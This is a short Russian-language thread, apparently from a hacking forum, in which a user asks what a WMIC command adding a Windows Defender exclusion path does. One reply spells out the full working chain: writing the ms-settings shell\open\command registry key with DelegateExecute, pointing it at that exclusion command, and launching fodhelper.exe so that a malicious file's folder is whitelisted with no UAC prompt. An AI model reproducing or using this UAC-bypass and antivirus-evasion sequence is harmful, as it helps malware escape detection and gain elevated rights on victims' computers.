Загрузка...

Explain line of code

Thread in C# created by dev1lteam Sep 3, 2021. 264 views

  1. dev1lteam
    dev1lteam Topic starter Sep 3, 2021 35 Aug 25, 2021
    Вот эта команда:
    WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"' + excludeDir + '\".
     
  2. AIexa
    AIexa Sep 3, 2021 Лучший софт - lolz.live/threads/1634798/ :+rep: 12,357 Mar 24, 2020
    добавление директории в исключения дефендера, он не будет сканировать эту папку
     
  3. dev1lteam
    dev1lteam Topic starter Sep 3, 2021 35 Aug 25, 2021
    это понятно
    The post was merged to previous Sep 3, 2021
    он работает только в powershell?
    The post was merged to previous Sep 3, 2021
    или cmd
     
  4. CoderVir
    чёт с дефендером связано. Хуе его знает. По крайне мере это к данному разделу не имеет вообще никакого отношения.
    мб
     
  5. r3xq1
    r3xq1 Sep 3, 2021 53 Jul 27, 2018
    dev1lteam, а загуглить мозгов не хватает?
    Для этого достаточно занести часть кода в поисковик Гугл или любого другого...
    [IMG]
    Куча инфы по данному вопросу.
    ----
    1) Создаётся значение в реестре
    Code
    HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command "DelegateExecute"=0
    Оно необходимо для обхода контроля учетных записей.
    2) Создаётся значение
    Code
    HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command
    указывающее на команду, которая занесёт путь к вредоносному файлу в «белый список».
    Вот эта команда:
    Code
    WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"' + excludeDir + '\".
    3) Выполняется
    Code
    C:\Windows\System32\fodhelper.exe
    что запускает вышеозначенную WMIC-команду. При этом никаких уведомлений со стороны UAC не выводится.
     
Top
Loading...